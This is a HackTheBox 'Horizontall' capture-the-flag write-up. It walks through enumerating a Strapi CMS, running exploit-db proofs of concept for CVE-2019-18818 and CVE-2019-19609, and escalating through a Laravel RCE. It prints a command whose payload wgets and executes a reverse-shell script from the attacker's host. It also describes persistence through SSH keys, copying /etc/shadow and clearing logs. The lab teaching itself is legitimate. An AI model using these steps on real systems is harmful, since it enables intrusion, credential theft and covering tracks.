HackTheBox: Horizontall Writeup

6 min readFeb 10, 2022
Photo by Pawel Czerwinski on Unsplash
IP =
Difficulty: Easy
Machine OS: Linux
Learning Platform: hackthebox.eu
Finished on: Arch Linux


Scoping and Preparation

I used my tool CTFRecon to automate directory creation, network scanning, web directory brute-forcing and adding entry to /etc/hosts file.

To use CTFRecon:

1. git clone https://www.github.com/hambyhacks/CTFrecon

2. cd CTFRecon

3. chmod +x ctfrecon.sh && cp ctfrecon.sh ../

4. sudo ./ctfrecon.sh [IP] [DIRECTORY NAME] [PLATFORM] [WORDLIST]

Preliminary Enumeration via nmap

Table 1.1: nmap Results

nmap results summary.

Machine OS: Based on OpenSSH version, machine is Ubuntu Bionic.


Manual Web Enumeration

Looking at the webpage at port 80, we are greeted by this webpage below.

webpage at port 80.

We can also look through the source code of the page.

source code for horizontall.htb

We can check for .js files in the source code to see if there is something interesting in it.

.js files found on source code.

Checking the app.c68eb462.js file, we can see that is obfuscated, meaning the JavaScript file is written in a way that is not human readable.

obfuscated .js code.

We can use Beautifier.io to make it more readable. Copy the whole content of app.c68eb462.js and paste it in the space provided in the web app.

subdomain found by looking at the beautified .js code.

We can also found it by manual checking the .js file.

also found by scrolling through obfuscated .js code.

Also make sure to add api-prod.horizontall.htb to /etc/hosts file.

Note: This is why manual enumeration is important!

We can now look at the subdomain of the webpage: api-prod.horizontall.htb.

api.horizontall.htb webpage.

Looking at the source code of api-prod.horizontall.htb, we found out that it is does not help us much.

source code for api.horizontall.htb.

We can also look at the web technologies used in api-prod.horizontall.htb using Wappalyzer.

web technologies used in api.horizontall.htb

We can see that the web server is using Strapi CMS.

Let's enumerate more using automated tools.

Web Enumeration using GoBuster

We need to find a way to enumerate the webpage further, this time we use automated tools to help us find endpoints in api-prod.horizontall.htb.

Using GoBuster, we found some interesting directories.

/admin directory found using GoBuster.

As we can see above, there is an admin directory! Let's try to navigate to that.

login page found in /admin.

Nice! A login page. We can try to do some basic SQL injection. I have only done manual testing before I tried to search strapi on Google.

googling strapi CMS possible exploits.

Tip: When in doubt, search it in Google.

Possible Exploits

We recently found out that api-prod.horizontall.htb is running strapi CMS(Content Management System).

Google search: strapi CMS exploit

First search result gives us an unauthenticated RCE on strapi CMS! But we need to know what version the CMS is running.

I got stucked here for a bit, but I tried to read the documentation.

I decided to read the python exploit script from exploit-db and searched it on Google. It is classified as CVE-2019-18818, CVE-2019-19609.

CVE-2019-18818 is an unauthenticated RCE (Remote Code Execution) which allows an attacker to reset an admin's password without providing valid password reset token.

CVE-2019-19609 is an authenticated RCE which allows attackers inject arbitrary shell commands because of improper input sanitization.

Reading the exploit script in exploit-db, the script is sending GET request to /admin/init. We can try to see if it is present in the web server.

version number found in /admin/init.

Cool! We confirmed that the version is indeed 3.0.0-beta.17.4.


Steps to reproduce:

  1. Go to Exploit-db and copy this script.
  2. Open a text editor and save it as CVE-2019-18818.py (or any filename you like).
  3. On your terminal, type:
  • python3 CVE-2019-18818.py api-prod.horizontall.htb

4. Copy the JWT token produced by the script and save it for later. Output should be like this:

running cve-2019–18818 PoC on target.

5. We can now login on the web server.

successfully logged in the admin panel.

6. Looking back at our status, we are now authenticated as admin. We can use the exploit script CVE-2019-19609 to get a shell on machine.

7. On your terminal,type:

  • python3 strapi17-4_RCE.py http://api-prod.horizontall.htb {JWT_TOKEN_HERE} 'wget http://{YOUR_IP}:{PORT}/{REVERSE_SHELL_FILE};chmod +x s.sh;bash s.sh' {YOUR_IP}
Setup for gaining reverse shell using the second PoC we found earlier.

8. Make sure http server and netcat listener are on before you hit enter.

9. Reverse shell should be downloaded and also the reverse shell should pop up.

successfully gained reverse shell connection.

Privilege Escalation / Post-Exploitation

Internal Enumeration

SSH port is open so I assume there is ssh-keygen binary in the machine.

To make sure we have access on the box even it errors out, we need to setup our ssh keys on strapi user.

Copy your SSH public key and add it on the machine's /opt/strapi/.ssh/authorized_keys.

We found a file named database.json on /myapi/config/environments/development/

found credentials in database.json.

We don't know what is the password of our current user strapi. We must enumerate further more.

Table 1.2: Checklist for Linux Internal Enumeration

short checklist for linux internal enumeration.

Notes: For more information about the commands look here

Tip: When nothing else makes sense, try to use LinPEAS (winPEAS for windows machines.).

Vertical Privilege Escalation

I got stucked here for a bit because I got on the rabbit hole finding the password for strapi user.

I also read some comments on the forum but I got stucked again. I read the comments again and again and I got what we need to do.

service running locally on port 8000.

We found out that Laravel version is vulnerable to RCE by searching the version number in Google.

laravel running on port 8000.

First, we need to login again to the ssh server with port forwarding so we can see the send request through port 8000. To do this:

Download this exploit PoC to root the machine.


Navigate to /root/ directory and get your root.txt flag!


The next two steps are not necessary for completion of the machine but it completes the 5 Phases of Penetration Testing.

Post Exploitation / Maintaining Access

Copied the /etc/shadow file for user identification and their passwords.

Added SSH key to as root user.

added ssh key for root user.

Clearing Tracks

Removed all logs and footprints to to prevent risk of exposure of breach to security administrator.

Status: Finished

Feel free to reach out and if there is something wrong about the above post. Feedbacks are also appreciated :D

Donation Box

Not required but appreciated :D


Originally published at https://hambyhacks.hashnode.dev.




Cybersecurity enthusiast | Posting CTF Writeups from HackTheBox and TryHackMe